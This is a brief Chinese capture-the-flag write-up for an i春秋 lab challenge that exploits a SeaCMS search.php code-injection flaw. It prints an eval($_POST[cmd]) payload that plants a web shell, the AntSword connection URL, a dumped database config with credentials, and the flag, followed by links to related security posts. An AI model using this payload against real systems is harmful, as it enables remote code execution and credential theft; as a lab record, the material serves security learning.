i春秋-Test

Manba_772024-05-12 10:31

题目


解题

参考WP

复制代码 
https://blog.csdn.net/qq_40654505/article/details/107142533/

目录扫描

复现wp

payload为:

复制代码 
search.php?searchtype=5&tid=&area=eval($_POST[cmd])

使用蚁剑连接

复制代码 
http://eci-2ze4iyhwj7xvb68bsb2t.cloudeci1.ichunqiu.com:80/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

cmd

找到数据库配置文件,/var/www/html/data/common.inc.php

复制代码 
<?php
//数据库连接信息
$cfg_dbhost = '127.0.0.1';
$cfg_dbname = 'seacms';
$cfg_dbuser = 'sea_user';
$cfg_dbpwd = '46e06533407e';
$cfg_dbprefix = 'sea_';
$cfg_db_language = 'utf8';
?>

鼠标右击这条shell,选择数据操作,添加上面的数据库用户名和密码连接数据库


复制代码 
flag{d2317097-0b48-4bbc-a968-90ec76ac67ea}
相关推荐
Root_Hacker1 小时前
sql注入学习笔记
数据库·sql·web安全·网络安全·oracle·网络攻击模型
青岑CTF2 小时前
攻防世界-Web_php_include-胎教版wp
开发语言·安全·web安全·网络安全·php
188号安全攻城狮5 小时前
【PWN】HappyNewYearCTF_9_ret2syscall
linux·汇编·安全·网络安全·系统安全
HaiLang_IT5 小时前
网络安全与执法专业【精选选题表】优质选题参考
安全·web安全·php
青岑CTF6 小时前
moectf2023-了解你的座驾-胎教版wp
安全·web安全·网络安全
刘婉晴6 小时前
【kali渗透测试】中间人攻击
网络安全·渗透测试
毕设源码-朱学姐6 小时前
【开题答辩全过程】以 基于python网络安全知识在线答题系统为例,包含答辩的问题和答案
开发语言·python·web安全
小李独爱秋7 小时前
计算机网络经典问题透视:RTS/CTS是强制使用还是选择使用?
网络协议·计算机网络·网络安全·信息与通信·信号处理
瘾大侠7 小时前
HTB赛季10 - Facts
网络·安全·web安全·网络安全
one____dream7 小时前
Reverse-elrond32
安全·网络安全·ctf
热门推荐
01GitHub 镜像站点02Clawdbot 中文汉化版 接入微信、飞书03OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)04OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书052026美赛A题智能手机电池续航时间预测的连续时间数学模型06UV安装并设置国内源07Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08Claude Code Skills 实用使用手册09Linux下V2Ray安装配置指南10在Trae中使用Pencil MCP